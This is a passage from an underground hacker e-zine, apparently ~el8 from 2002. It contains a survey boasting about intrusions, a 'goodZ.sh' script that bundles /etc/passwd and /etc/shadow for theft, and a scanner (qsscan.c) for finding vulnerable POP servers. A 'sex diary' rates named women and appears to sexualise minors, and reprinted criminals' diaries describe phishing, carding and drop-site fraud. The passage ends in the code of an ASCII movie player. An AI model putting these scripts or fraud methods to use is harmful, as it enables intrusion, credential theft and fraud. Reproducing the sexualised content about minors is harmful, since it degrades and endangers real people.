issue three (http://packetstorm.decepticons.org/mag/~el8/), without your email
address in it. Issue 4 will be available in late December 2002 (likealways).
You may choose not to answer some of the questions if they
may jeopardize your freedom. If you do want your email included, please
state it in your reply. Thank you for your time.

__general__

1) what is your hacker alias? you can choose to be anonymous.
2) name something big you hacked.
3) what inspired you to become an elite hacker?
4) name some of your affiliatez.
5) name something else you hacked.
6) have you been busted? if so, stop here, we dont care about u, lamer.
7) how many years have you been a blackhat/dark hacker?
8) how cool is the ~el8 ezine?
9) what ideas do you have to help the ~el8 marketing team?

__damage__

1) how many ppl have you rm'd in your hacker travels?
2) if more than 30 ppl, are you an angry person?
3) name something else you hacked.
4) have you ever accidently fucked up a box?
5) have you ever done something sinister like echo "death."|wall just
before rm'n someone?

__skills__

1) estimate how many computers you've broken into.
2) can you hack into computers faster than you jot them down?
3) who is the most influentual person you've ever hacked?
4) what is the fastest computer you've ever hacked?
5) how many users were on the biggest computer you hacked?
6) who do you look up to or respect?
7) what's the most exotic system you have ever been on?
8) want to brag about anything?

__comments__ ?

__end__

As a token of our gratitude for filling out our survey, we give you 'goodZ.sh'.
have fun!

--'begin'--
#!/bin/sh
# goodZ.sh
STR=`hostname`.`date +%m.%d.%y`
mkdir $STR
cp /etc/passwd /etc/shadow /etc/master.passwd $STR
tar -cvf $STR.tar $STR
gzip $STR.tar
rm -rf $STR
--'end'--




.~v~----------------------------------------------------------~v~.
; *20* ~v~ c0ntributi0nz -- Vari0uz by k4ri0uz ;
`----------------------------------------------------------------'

th3z are c0ntributi0nz fr0m vari0uz d00dz wh0 give us shyt t0 put
in ~el8, with0ut a d0ubt the gr8zt ez1ne evr t0 gr4ce the undrgrnd.
g1ve us m0re shyt plz.. g1ve us m0re shyt plz.. g1ve us m0re shyt plz..

ind3x:
[0] - qsscan.c by duke
[1] - gaius's jakarta sex diary
[2] - christian hackers manifesto, by religious hacker Raschid
[3] - hakdiary, life of a cyber criminal

[BEGIN_DIR] 20_contrib
[CUT_HERE] qsscan.c
/*

*** ADM PRIVATE . PLEASE DO NOT DISTRIBUTE THIS CODE . ADM PRIVATE ***

qsscan.c --> qpopper/SCO POP scanner.

by duke

this scanner *only* returns vulnerable qpop and sco pop versions to the
results file

usage: qscan <hostlistfile> [outputfile]


props to: gr1p, tewl, deprave, xbish, fh, sewid, ph1sh and the rest..

*** ADM PRIVATE . PLEASE DO NOT DISTRIBUTE THIS CODE . ADM PRIVATE ***

*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

void usage(char *);
void printheader(void);
void testhost(char *);

FILE *of;

int main(int argc, char *argv[])
{
FILE *fp;
char host[1024];
int c;
c = 0;
printf("\nqsscan: qpop/sco pop scanner for linux by duke\n");
printf("----------------------------------------------\n\n");
if(argc < 2){
usage(argv[0]);
return 0;
}
if(argc == 3){
of = fopen(argv[2], "w");
printheader();
} else {
of = stdout; /* when using fprintf i can refer to stdout or log
file without having to do conditions */

}
if((fp = fopen(argv[1], "r")) == NULL){
printf("error: input file does not exist\n");
return 0;
}
printf("scanning...");
while(fscanf(fp, "%s", &host) != EOF){
testhost(host);
}
printf("end of scan\n");
return 0;
}

void usage(char *progname)
{
printf("usage: %s <inputfile> [outputfile]\n", progname);
printf("\n\ninputfile: a list of hosts (or ip's) to scan\n");
printf("outputfile: optionally record results to a file instead of stdo
ut\n\n\n"
);
}

void printheader(void)
{
fprintf(of, "qpop/sco scan results file\n");
fprintf(of, "--------------------------\n\n");
}

void testhost(char *target)
{
struct sockaddr_in server;
int sockfd, i;
char version[256];
struct hostent *hp;
printf("%s\n", target);
if((hp=(struct hostent *)gethostbyname(target)) == NULL) {
return;
}
sockfd = socket(AF_INET, SOCK_STREAM, 0);
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
server.sin_port = htons(110);
memcpy((char *)&server.sin_addr, (char *)hp->h_addr, hp->h_length);
if((connect(sockfd, (struct sockaddr *)&server, sizeof(server))) == -1)
{
return;
}
i = read(sockfd, version, 100);
close(sockfd);
if((strstr(version, "QPOP")) != NULL){
if((strstr(version, "2.5")) == NULL){
fprintf(of, "%s: %s\n", target, version);
}
}
if((strstr(version, "2.1.4-R3")) != NULL){
fprintf(of, "%s: %s\n", target, version);
}
return;
}
[END_CUT] qsscan.c
[CUT_HERE] jakartasex.txt
Arie xxxxx First girl I fucked in Jakarta, she came with 2 girls who
pretended to be asleep in my bed while we were having a good
time. (23)
Joanne x bah she was 4 months pregnant.. kindda turned me down (20)
Linda xxxx the one who calls five times a day.. (20)
Tanya xxxxx incredible, tight as hell, awesome body (19)
Yuly x the one I fucked in the bathroom (18)
Ella xx lovely... too bad she doesn't speak a word of english (18)
Umi xx tall girl... (23)
? x from stadium (19)
Monica x was this chick once a man? disgusting (22)
? x cute slut we fucked together with Matthieu (20)
? x came with Matthieu's girl (21)
Oma xxxx did her in the hot tub, i would like her daughter though (36/12)
Lita x was still a virgin. (16?)
Rosya xxxxxxxxx really good sex. (23)
Melly xx made love to her in the swimming pool (19)
Soraya x fashion designer, she's really horny.. (27)
Lida x stupid bitch... she's banned (22)
Sue xxxx really loved anal, very kinky, kinda chubby. (32)
ayu xx good fuck (19)
ney xx tall thai girl in singapore, great and 4 hours fuck (22)
Debi x impressive (21)
Hellen xxxx was still a virgin... (19)
Sonya xxx seemed experienced, great oral.. (14)
Mel x really loose but very energetic (26)
Linda xx pretended she had only made love once b4 than told she was
still a virgin just before I did her. And indeed she was (18)
Lisa xx I made her cry when I told her love was only for god (24)
Marie x she's a sex maniac.. started to touch herself while driving,
and sucked me in the living room than after we fucked, she
claimed she likes to organize orgies with like 6 girls for 2
guyz and she likes to get fucked with a dildo in her butt. (24)
Yanti xx stolen from Henri, really sexy. (18)
Gorilla xx really bad sex... she fucks like dead woman (18)
Rita xxxxx Sodome girl, pretty face, fantasy body, perfect tits and
the best of all those crazy girls. (19)
[END_CUT] jakartasex.txt
[CUT_HERE] hackerPaladins.txt
[Hacker Paladins]======================================================[Raschid
]
/* Editors Note: Many of our readers has expressed a certain need to well,
express themselves. Not everyone can talk tech all the time, but they certainly
do vent out through their writings. Which, has brought a change of thinking
to the Keen Veracity staff. KV has primary been a technical zine, a forum to
express ideas based on technology. We believe that in order to reach this point
,
one must take a stride through some other areas in order to stimulate thought
processes. We hope to maintain a level of technical savvy, but we would also
like to let some others stretch that expertise into something that merges tech,
mind and soul. Hopefully, we may be able to stretch our intellects through the
wanderings of personal expression.
*/

Behold a broken world, we pray,
Where want and war increase,
And grant us, Lord, in this our day,
The ancient dream of peace.
No force of arms shall there prevail
Nor Justice cease its sway;
Nor shall their loftiest visions fail
The dreamers of the day."
-"
Behold a Broken World"; Christian hymn
Of what benefit is there in fighting darksiders? Of what gain is
there in thwarting their advances into the souls of our people? What use
is there in resisting this element amongst us which rejects honor, which
rejects knowledge, which rejects curiosity; which rejects all that is
good, and clean, and noble and yet allows baseness, corruption and
dishonor to flow so freely amongst the hearts and minds of our people? O
my brothers and sisters in the underground, is this not a disgraceful
thing? Through this we have found dishonor and ill favor among the other
people of the world, that our name is considered a curse on the lips of
all who utter it. Our name is that of the wolf on the lips of the
digital lambs.
And few care.
Few it seems, give a jolly damn about the consequences of their
action. Gone are the days of technical competence to achieve amazing
results. Gone are the days of literature exclaiming the hacker as a good
guy, someone who might just be alright, who is not necessarily the
harbinger of doom, the demon of cyberspace. It's been suggested, half
seriously, that the Anti-Christ just might be himself a hacker. And what
of it, my friends? In our post-modernist society, where pop-culture has
the attention span of an infant, it would seem plausible that such
concepts as love, loyalty and virtuous living play a role in their lives
only insomuch as it fails to inconvenience them. If our current age of
people cannot abide such concepts, how can the hacker underground? For
surely, we are nothing but the cybernetical extension of our
surroundings.
What has Zarcae to offer that your television does not? We offer
the concepts of love, of ennobling our hacker brethren with those
virtues which have long disappeared from the mainstream culture. There
are two conceptions of the world of cyberspace floating about in the
common parlance. One is of the Wild West, where cigarette champing
cowboys roamed over an anarchistic frontier, where the only law was laid
down by whomever had the fastest gun and most ammunition. What few
authorities there were of true law and order were jokes typically,
facsimiles of those virtues. The second main idea of cyberspace (and
less popular one) is that of the medieval era, where the monarchy being
replaced instead with the technocracy of sorts. That is to say loosely,
that the more technical ability a person possesses, the higher in the
social order of his relative society he will be. A main thesis of Zarcae
holds this second main ideal of cyberspace to be the most accurate, and
charges that hackers are the equivalent of knights in the Middle Ages.
With our skills at intrusion, and the ability to wreck concentrated,
disciplined havoc among computer systems, with said skills even
possessing the ability to wreck chaos outside of cyberspace, it could be
said that the possession of such skills is the equivalent, literally, of
the militial skills of those historic knights.
The problem with out analogy is that it begs for complicated
technical expertise. This is no longer the case, as lamented by Erik
Bloodaxe in the last Phrack editorial he did as editor in chief of it a
few years back. He commented that as the level of technical competency went
down, the quality of hacker went down in direct proportion, and the
quantity of people ABLE to pursue violent action in cyberspace rose
inversely. Thi

  
s is to say, still following our analogy, that as the
level of military training needed went down, and as the level of
technology rose so that even fools could fight skillful battles with
rudimentary muskets and such , the quality of knights went down (where
"quality" is equated with "ethicality") in direct proportion, and the
amount of people able to engage in battle rose inversely.
These are simple questions, OBVIOUS questions, but ones rarely
asked or answered. Most people fail to consider the squires and would-be
mercenaries of the underground (i.e., script kiddies, "warez" pirates)
as knights, but this does not necessarily fail to distinguish them from
those skilled cybernetic knights who have wholly sold their skills to
the pursuit of profit or power, whom we call "darksiders". These hacker
have given away their talent, prostituted their ability in the cause of
baseness and immorality. They have betrayed their cultural legacy, and
as such, propose a direct threat to us all.
What then, does Zarcae propose to do about the mercenary class of
hacker which has sprung up in the underground? How do we propose to
counter-act the sea of immorality plaguing our people? What to do?
Zarcae proposes to arise two new ideals of hacker. As I have stated, a
basic Zarcae tenet is to hold hackers as knights; what is needed is to
raise that standard further, to bring home the concept of the 'paladin
hacker', which is to say, the concept of the hacker who fights with
righteousness and the good on his side, bringing said lost virtues back
to his people. To such a hacker, there is no enemy insurmountable, no
evil so great as to not be overcome. Why, then, is our task called
glorious? Because it is the stirring of the human soul against tyranny,
it is the ringing cry to battle which lies in the hearts of all people,
the noble love and fierce loyalty all hold towards family and people. We
are protecting our own. The second concept is that of the 'scholar
hacker'. Too long has the underground languished under a shadow of
ignorance. Too long has communication flowed in tiny spurts among the
elite, so that the gifted beginners in the underground gain knowledge to
join their princely ranks only TO finally join as those jaded members
they formerly swore never to become. Jaded, and incapable of rendering
good works unto their fellow men and women as their high status
honorably requires through moral obligation. Zarcae proposes the
establishment of a hacker intelligentsia. We need an intellectual elite,
capable of fielding the hostile outsider lashings of a world which
misunderstands us, which fears and reviles us. We need hacker
apologeticists, who can reasonably combat these arguments against the
very existence of our people.
There are scattered individuals who fight against this tide of
incompetence so dominant in our people in the underground today. It is
to be hoped that Zarcae will only be the first of such groups to
encourage honest debate and intellectual argument among the underground,
that others may follow, and so allow their lights to shine even greater
than ours. We are the first, but the first is not necessarily the
greatest, and in time. I feel, there will come others whose light will
shine so much as to eclipse Zarcae's very memory. As to that time, I
feel little sorrow, since we will have accomplished our purpose in
igniting the passions of those intellectual descendants. Let our memory
pass away into Time, as we ought to have no need of the vanities of
mortal men. Let our deeds stand as our legacy, aside from vain words.
Combined with the holy righteousness of the paladin, and the
thoughtful pondering of the scholar, we come upon the question as to
central motivation. What WILL be the overriding passion to which will
give rise to all the actions of those who follow the Ethic? The answer
to that is: Love. It is love of our fellow men and women which will
inspire us to our acts of daring in cyberspace. It is through love that
we will graciously accept the persecutions that the federal authorities
and our mis-understanding brethren in the underground will render
against us, and it is through love that we will inspire them to quit
their heinous acts, lay down their swords of injustice, and follow us.
Without love, all these virtues of justice, nobility, honor, would be
useless. What use is the dispensing of the actions of goodness, without
it being tempered with the love of the people involved? There is no
goodness where love is not present. The Ethic forces our behavior
outside of cyberspace to reflect our actions inside of it. The hacker
who has spent his nights away from the modem carousing, drinking,
cursing has no place in the hacker paladin ranks; how could he condemn
the darksider when his soul is half there already?
"Love must be sincere. Hate what is evil; cling to what is good."
-Romans12:9
Without love, the eloquence of the greatest prophets ring hollow.
There is no urge to follow noble ideals, only the lust of profit, and
for power. Without love, the great deeds of virtuous men seem empty, and
devoid of that noble spark, crumbling eventually, and sinking back again
into the pit where evil waits patiently for the fall of all things,
noble and un-noble alike.
"So justice is driven back
And righteousness stands at a distance;
Truth has stumbled in the streets,
Honesty cannot enter.
Truth is nowhere to be found,
And whoever shuns evil becomes a prey."

-Isaiah 59:14-15
I have talked in the past of hackers who give lip-service to the
ideals we express, but do nothing. How foolish are they! The ideals we
express should be as a fire in your blood, constantly upon the brain,
and a sword upon your tongue, to go forth and deliver your messages of
goodness to the entire hacker community, that we may reform our manner,
and so become true paladins and knights, and no longer mercenaries or
bandits as we have fallen to.
"What good is it, my brothers, if a man claims to have faith but no
deeds? Can such faith save him? Suppose a brother or sister is without
clothes and daily food. If one of you says to him "
Go, I wish you well;
keep warm and well fed', but does nothing about his physical needs, what
good is it? In that same way, faith by itself, if it is not accomplished
by action, is dead. But someone will say, You have faith; I have deeds.'
Show me your faith without deeds, and I will you my faith by what I do.
You believe there is one God. Good! Even the demons believe that and
shudder."
-James 2:14-19
As such, do we find later in James, another passage about wisdom
and deeds. For a man or woman to be considered wise by Zarcae standards
is not much; it is only to live as a person of faith in the Ethic, and
to show that Ethic through their actions to others, both in cyberspace,
and out. Such a man or woman need not even themself be a hacker, for
surely my friends, that I am not. I have adopted the hacker underground
as my own people, and would hope likewise to have been adopted, but I
myself am not of the same stock as you, I have not learned the same
tenants, have little knowledge of the same technology. This is not to
say, friends, that I do not desire it. However, I have found it hard to
find such knowledge, and wish readily enough for teachings, as I suppose
many others of good quality do. This is somewhat what I mean by an
established intelligentsia. It is as of yet too difficult for the gifted
of our people to learn. We must establish some method to raise our
people our of ignorance, raising them in knowledge with the Ethic, so as
to form a community of hacker paladins and scholars.
"
Who is wise and understanding among you? Let him show it by his good
life, by deeds done in the humility which comes from wisdom. But if you
harbor bitter envy and selfish ambition in your hearts, do not boast
about it or deny the truth. Such wisdom does not come down from heaven
but is earthly, unspiritual....[f]or where you have envy and selfish
ambition, there you will find disorder and every evil practice."
-James 3:13-16
What then, is the quality of those who would follow the Zarcadian
Ethic? It is simply to be loving of all, foe and friend alike. It is
nothing to love your friends, even the worst of your fellow men and
women manage that. If you can curse the feds and love your friends, what
is that? You have failed in the Ethic, and are unworthy to be counted
among the ranks of the paladins. Your sin describes you, and you have
shown by your deed that you are not of our kind. Therefore, to love your
foe is not to be submissive to them. They cannot understand their error
so long as they labor under the clouds of their ignorance and lusts of
power and social status. Your must teach them as you can, the errors of
their ways. Failing that, you must hand them over to their respective
justice systems, in the hope that such will correct their ethic
troubles. Many among you will be puzzled by this, but it remains true.
The federal authorities, though they will certainly persecute you, are
nonetheless your allies in your endeavors. They abide by the same ideals
largely, that you do. Justice is the basic idea of our modern legal
system. Ineffectual or not, it is all we have to go by.
Another reason remains for our assistance of the federal
authorities of their capturing of the most malignant of the darksiders:
they simply are overmanned. It is estimated that the FBI would have to
spend every day, of every year, with every agent, just to keep barely
current with computer crime. Currently, the Computer Crime Unit of the
FBI and the computer crime specialists of the Secret Service is
ludicrously small, and inept at any efforts to stop the waves of attacks
that darksiders launch daily on the digitally innocent. As paladins, we
owe it to these authorities to help them in their quest.
I spoke earlier of envy and ambition. Such is to be avoided at all
costs by the followers of the Ethic. I myself am the leader of Zarcae
only by default of having created the group; no doubt there are others
more eloquent, more impassioned in their speech, more technically
competent to lead than I; surely there are others beside whom my
knowledge and talents are as those of a child. In the absence of such
characters, I believe it my duty to lead the group. Envy is horrible for
paladins; why be jealous of a brother or sister who is better
technically able? This is foolish. The better thing is to ask assistance
from that person on what ails you technically, so that you may better
serve others through your skills. If they are of little help to you,
what of it? There are thousands of areas in electronics, computers, and
such, where you could otherwise occupy and specialize. Even those who
know nothing of hacking at all are useful in their writing talents; they
may be hacker ethicists, who argue for a logical philosophical basis on
which we may rest our actions firmly.
With all that said, welcome to the coming Revolution friends, and
Godbless.
-Raschid
*Founder of Warzael Zarcae

[END_CUT] hackerPaladins.txt
[CUT_HERE] hakdiary.txt
Daily diaries show how computer criminals earn their living
By Bob Sullivan
MSNBC
March 27 -- Claims of six figure "
salaries" earned without ever
leaving the bedroom. A hearty supply of "
free" computer hardware and a
never-ending e-mail inbox full of victims. Credit card accounts
"
phished" from fake porn sites, or clever e-mails promising "You've
got Pictures" that ask for AOL user names and passwords. What do
computer criminals do all day? Work the system -- and reap the
rewards. In this MSNBC.com exclusive, you'll get a chance to peek
inside the daily life of two computer criminals, and see how the
system works to their advantage.
SECURITY EXPERTS WILL tell you most of the computer attacks
they see every day are initiated by clever teen-agers, so called
"
script kiddies." Many of these never get much past the stage of
simply altering Web page content a few times, a temporal, harmless
instance of graffiti in the virtual world. In fact, some argue these
curious computer kids are hardly criminals at all.
But there's no mistaking the other side of the computer
underground, the so-called "
carders." To them, anonymous e-mail
addresses, credit card numbers, and uninformed Net users are all the
basic ingredients for crime. Some claim to earn thousands each day
just by working various scams.
Understanding who these criminals are and what they're up to is
part of the job of a computer security professional. Dan Clements,
president of AdCops.com, has taken this "
know your enemy" credo to a
new level.
Clements started AdCops.com two years ago to help Internet
merchants fight credit card fraud.
"
No one else was really helping," Clement said. He wanted to
form a community where merchants could swap horror stories and have
frank conversations about theft at their sites.
Hacks, Attacks & Scams
o Curador pleads guilty to hacking
o IE bug exposes e-mail and files
o Internet company settles pyramid scheme claim
o Microsoft digital certificate stolen
o Associated Press Web site hacked
o No genius needed to hack bad system
o A tale of government 'panic'
Since then, fraud and credit card theft have run rampant on the
Internet, and Clement has collected so many horror stories that he's
changed his site into a virtual museum -- the "
Fraud Museum."
Inside are AOL password-stealing schemes, fake Web pages
designed to steal Internet access accounts -- even a free e-mail inbox
full of hundreds of notes from fraud victims who willingly submitted
their credit card account numbers to a con artist.
In part to promote the site's work, and also to help merchants
understand their minds of their enemies, Clements recently paid two
criminals to keep a log of their daily lives.
"
We pay them to get front-line current fraud information,"
Clement said. "
Until you see it, you don't completely understand it.
It's shocking."
Below, in excerpted form, are some of their entries.
Editor's notes are in italics. Note that computer criminals are
apt to exaggerate their successes.


CRIMINAL NO. 1
11:00 a.m. Damn it's early I just woke up. My carded (purchased
with a stolen credit card) laptops in bed with me. Hell, I don't even
have to get out of bed to go to work. OK, some guy on Efnet (an
Internet chat area) told me last night he would Western Union me $250
if I wrote a diary of one of my typical days and e-mailed it to him in
.doc format. He was too stupid to be a Fed. Hell I don't care if he
is, he can't track me.
Now as soon as members sign on they get warnings all over the place
about online frauds. Screw AOL. I'll still make six figures this year.
They are always a step behind.
11:01 a.m. Well, I just checked www.westernion.com and he
wasn't lying, he sent the funds. I got the tracking number and he paid
by cash so I can pick up the money without an ID. Secret
question/answer was "
what's your mother's maiden name?" Answer was "tu
madre." All I gotta do is tell the guy at the Western Union "tu madre"
and he'll hand over the money. I make sure I rotate Western Union
offices and go to the gas station ones. They usually don't have
cameras.
Let me check what I racked in on e-mail accounts from the
lamers (potential victims). Damn, my Yahoo box is dead. Freak, I had
to make another one. I got a script that will make me 10 yahoo e-mail
accounts in 30 seconds, so this didn't put me back too much. I make 10
boxes and I'll have them for the whole week. Two weeks if I'm lucky.
11:03 a.m. Open up one of my new Yahoo accounts through an
untraceable NetZero account. I use www.anonymizer.com to go to the
Yahoo account because I'm paranoid. Hell if anyone's going to get my
IP (Internet address). Screw the Feds, they are lazy they won't trace
me back that far. Plus I got *67 on, they'll need subpoenas to, and a
ton of tracing to even get close to me.
By then I'll have a new number. Hell, I go through telephone
lines about one every 2-3 months. If I'm super paranoid, I skip
Anonymizer and hack me a Wingate. Then the Feds will trace back to one
of the lamers' home computers not mine ;) LOL! Basically if I use a
Wingate they can't track me at all! I should use gates more often ;(
Hell I'm getting almost as lazy as a Fed. Ha!
11:08 a.m. Ahhhh, good old MaLad0ck from .ru promised me 50
phish (sets of stolen e-mail and account information, potential
victims). I'll give him $100. I won't pay him cash. Too traceable. I
don't even trust him. Met him about a year ago on efnet. Could be a
Fed. He'll get paid with Paypal money. He's sending first. Don't ever
trust a Russian :)
I mail out something saying "
You've got pics...click here." Of course
it goes straight to my free site scam page and tells them to enter in
their l/p -- login/password for the clueless.
11:18 a.m. Ahh. Nice. My "
You've got pics" scam page up on my
free host (name removed) hasn't been termed (taken down as a terms of
service violation). This will save me some work. God I love (name
removed) they are almost begging to get spammed. LOL. Their admins let
my scam pages stay up for weeks sometimes.
Most free sites, first thing they do in the morning is check
abuse@theirsite.com to see who's been spaming. Not these guys. BTW
actually (name removed) does. I'm not going to tell you what freesite
never terms ... don't want the word to get out. I do like to use west
coast free servers they are 3 hours behind the east coast. So their
admins don't check till 12 noon east coast time. That gives me some
time so all the 9-5 lamers can check their email and fall into my
trap.
WOW! We just got 30 fresh cc's. Now we gotta go call the 800 number on
back to find a good cc with lots of cash :)
11:38 a.m. Freak! I forgot to start grabbing AOL e-mail
addresses from member directory. Dammit, I ought to eat breakfast.
It's almost noon time. What is that, brunch? I haven't left the house
in three days, too much stuff going on. I'll get food delivered. I'll
call on my cell -- not like I pay for service. LOL. Gotta love
phreaked (stolen) cells.
11:40 a.m. OK, pizza's on the way. Just set up computer two on
my network to start collecting some AOL members' e-mail addresses so I
can spam. You gotta love AOL. Well, at least their members. I make
bank on their stupidity.
12:41 p.m. OK, I got 12,000 AOL members. Time to go
phishingggg!!!!! (spamming).
I mail out something saying "
You've got pics...click here." Of
course it goes straight to my free site scam page and tells them to
enter in their l/p -- login/password for the clueless.
3:30 p.m. Check yahoo account -- 22 more phish show up. AOL
members are slow today. Damn, I should have about 50 by now. AOL is
tightening up. They got ripped so bad last year on carders and all
that stuff. Now as soon as members sign on they get warnings all over
the place about online frauds. Screw AOL. I'll still make six figures
this year. They are always a step behind. Actually about five steps ;)
lol ok.....
3:54 p.m. Set up Yahoo mail account to dump credit card info
into.
4:30 p.m. Put up phony adult site on free host, complete with
front end and a back-end credit card submission page. I'm going to get
me some "
members" LOL. Going to be the most expensive site these
members have ever joined..rofl (rolling on the floor laughing). That's
what they get for buying porn.
4:50 p.m. Mail to AOL members about a hot new adult site, it's
really my fake site on the free host so I can get their credit card
numbers and card some stuff. ooooooooops!
5:30 p.m. I'm going to go meet my girlfriend. Take her out to
dinner, go back to her place. Enough of this diary stuff.
7:50 p.m. OK, I'm back. Checked Yahoo mail account, 15 credit
card forms are sitting in the account. All while I was at my
girlfriend's. ;) Tommorow's going to be a nice day. I'll get me about
5 laptops with these cards.
8:30 p.m. Click on adult banners to create a clicks/sales ratio
with a click generation program. I make about $2,000 a month on fake
hits. Not much but it adds up :) My old box actually runs dedicated
doing that stuff 24/7. Gotta love it :)
8:50 p.m. Sign up 2 adult sales. Making $100. Don't want to do
too much, it will look suspicious. But think about it like this: $100
a day. times 30 days is ... $3,000 a month. Crime doesn't pay? :)
9:13 p.m. Click on Amazon banner and create an affiliate sale.
Sent books anywhere. Net is $20.17 to advertising account. Lame money
but I'm bored, watching TV so I do this when I don't have anything to
do. I might make $1,000 a month doing this if I'm not lazy.
9:23 p.m. I better kill these cards. I need them to get worn
out. More people that use them, the harder it will be for the Feds to
narrow it down to me. Ill trade the 30 credit card numbers and ccv2
(number on the back of credit cards used for added security) for maybe
$100. Not much but better than delete them.
10:30 p.m. I'm going to Efnet. I gotta find me a good site that
will send lappies (laptops) w/o too much hassle. dIrkSTIR (not his
real name) says (site removed) caught on and isn't sending stuff out
any more. I'll find a good merchant. Maybe trade some shells (access
to remote computers) or phish to find a virgin site.
11:00 p.m. OK I'm out. Time to go drinkkkkk away some of my
$250 I got for writing a diary LOL.

CRIMINAL NO. 2
DAY 1
11:00 p.m. Relax get on the computer, check e-mail account for
some fresh credit card numbers.
11:04 p.m. Realize that I already used all my cc's, not fresh
anymore :( gotta collect fresh cc's
I do like to use west coast free servers they are 3 hours behind the
east coast. So their admins don't check till 12 noon east coast time.
That gives me some time so all the 9-5 lamers can check their email
and fall into my trap.
11:05 p.m. Go open a new email@LA.com free e-mail account using
a untraceable ISP account `shared among friends.'
11:15 p.m. Put the AOL billing scam page up on a free host
11:20 p.m. Start collecting AOL e-mail address from member
directory with screen name collector program.
11:45 p.m. Load up `Bulk I-Mailing Program' to mail AOL billing
scam
12:00 a.m. All mail sent now. We just wait and talk to friends
until more cc's come.
12:30 a.m. WOW! We just got 30 fresh cc's. Now we gotta go call
the 800 number on back to find a good cc with lots of cash :)
1:20 a.m. Now that we got 2 Credit Cards with $5,000 limits on
them, let's go have some fun
1:25 a.m. Scan around Amazon.com, looking for something to buy
-- PlayStation 2
1:35 a.m. Call and wake up my buddies to make sure it's still
cool to use his house to use as a drop site.
1:45 a.m. Stop BSing with friend, and now about to order 2
PlayStations and lots of games
2:00 a.m. Now that I can use my friend's house to drop off the
toys, filling out order info
2:05 a.m. Checking e-mail account, making sure order went
through fine
2:15 a.m. Go back to IRC room and BS around and trade some CC's
for some Paypal Accounts.
2:30 a.m. Got someone to hook me up with 2 verified Paypal
accounts now
Most free sites, first thing they do in the morning is check
abuse@theirsite.com to see who's been spaming. Not these guys.
2:35 a.m. Going to www.ebay.com and find something to buy --
two new laptops
2:45 a.m. Log on to Paypal accounts and send off payments
2:50 a.m. E-mail the owners of the laptop that I just won and
tell him I already sent payment from the Paypal account, and please
ship to this address overnight mail. I added the extra $25-$50 for
shipping charges.
3:00 a.m. Time to get some sleep
[lnk_bbs.gif] What do you think about the hacker diaries?
[dotblack.gif]
Day 2
9:00 p.m. Time to get back online and check e-mail account and
see if PlayStations and laptops are on their way
9:05 p.m. Just found out they both got shipped; everything went
as planed
9:10 p.m. Going to http://www.usps.com/tracking.cgi and
checking when it will get to my friend's house
9:15 p.m. Everything has been taken care of and in less then 24
hours I have ordered two laptops and two PlayStations with about 10
different game's total of about $4,000 not to bad of a day of work.
[END_CUT] hakdiary.txt
[END_DIR] 20_contrib




.~v~----------------------------------------------------------~v~.
; *21* ~v~ HackPlayer (TM) -- ~el8 TEaM ;
`----------------------------------------------------------------'

HackPlayer is a revolutionary ascii film player developed at ~el8
labratories. It has a bundle of usages:

* [00] : Create your own hacker comic books
* [01] : Display your ascii slideshow to your family
* [02] : Create your own ascii movies
* [03] : Make tons of ascii porn frames, display them randomly (ascii zgv)
* [04] : Load up the "
TRON ROLLING" movie and leave it as a screen saver
* [05] : Load up a bunch of irc quotes, and display them randomly
* [06] : Turn your display into a funky fresh psychodelic display
* [07] : Create ascii porn movies (the wave of the future)
* [08] : Set up HackPlayerPoint Presentations (Ascii Power Point)
* [09] : Leave it on as a screen saver during a LAN party
* [10] : Ascii TV

We included a short movie for your enjoyment. It is entitled:

"
TRON ROLLING"

This film was directed by SiLLY G00S3 and PoonTar at the ~el8
film studies consortium in the development lab.

Feel free to directed / create / edit your own hacker film, and
send them to el8@press.co.jp. If you want, they can be included
in ~el8[3]. Create your own film, send it to ~el8, become ~el8.

First the code. Then the movie. Pure laughter.

[BEGIN_DIR] 21_HackPlayer
[CUT_HERE] compile.sh
# sh compile.sh, then ./HP <movie[TRON_ROLLING.hp]>
#!/bin/sh
gcc playonplaya.c -lncurses -o HP
gcc framez.c -o framez
#rm -f ./HP ./framez
[END_CUT] compile.sh
[CUT_HERE] framez.c
/* cat movie.raw | ./framez > movie */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
char buf[2048], b0f[2048];
int fcnt=0;

setvbuf(stdout, NULL , _IONBF, 0);
for(;;)
{
bzero(&buf,sizeof(buf));
bzero(&b0f,sizeof(b0f));
if(fgets(buf,sizeof(buf)-32, stdin)
==NULL) break;
if(strstr(buf, "
FRAME_BEGIN")) {
buf[strlen(buf)-1]='\0';
snprintf(b0f, sizeof(b0f), "
%s %i\n", buf, fcnt);
printf("
%s", b0f);
}
else if(strstr(buf, "
FRAME_END")) {
buf[strlen(buf)-1]='\0';
snprintf(b0f, sizeof(b0f), "
%s %i\n", buf, fcnt);
printf("
%s", b0f);
fcnt+=1;
}
else {
printf("
%s", buf);
}
}
return(0);
}
[END_CUT] framez.c
[CUT_HERE] playonplaya.c
/* HackPlayer (TM) A Product of RealPlayer.COM (TM)
*
* This product or document is protected by copyright and distributed
* under licenses restricting its use, copying, distribution, and
* decompilation. No part of this product or related documentation may
* be reproduced in any form by any means without prior written authorization
* of RealPlayer and its licensors, if any. Third party software, including
* font technology, is copyrighted and licensed from RealPlayer suppliers.
*
*
* Authors:
*
* SiLLY G00S3 -> the h1gh preezt
* FuNNY BuNNY -> a BLiP on your gaydar
* ODaY MaZTeR -> getz all the HoEZ and CoDEz
* ENRiCO -> insane in the MeMBRAiN
* ReDPUBeZ -> aka KARRoT_BoTToM
* CaWCaW -> eye'll te4r YoUR EyEZ OuT
* KRaD -> so FReSH & so CLEaN
* CLiFF SToLE -> CLiFF SToLE YOUR NoTEZ
* PoonTar -> CRaZY CooL FRe$h
*
*
* Usages:
*
* [00] : Create your own hacker comic books
* [01] : Display your ascii slideshow to your family
* [02] : Create your own ascii movies
* [03] : Make tons of ascii porn frames, display them randomly (ascii zgv)
* [04] : Load up the "
TRON ROLLING" movie and leave it as a screen saver
* [05] : Load up a bunch of irc quotes, and display them randomly
* [06] : Turn your display into a funky fresh psychodelic display
* [07] : Create ascii porn movies (the wave of the future)
* [08] : Set up HackPlayerPoint Presentations (Ascii Power Point)
* [09] : Leave it on as a screen saver during a LAN party
* [10] : Ascii TV
*
* HackPlayer (TM) A Product of RealPlayer.COM (TM) */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <ncurses.h>

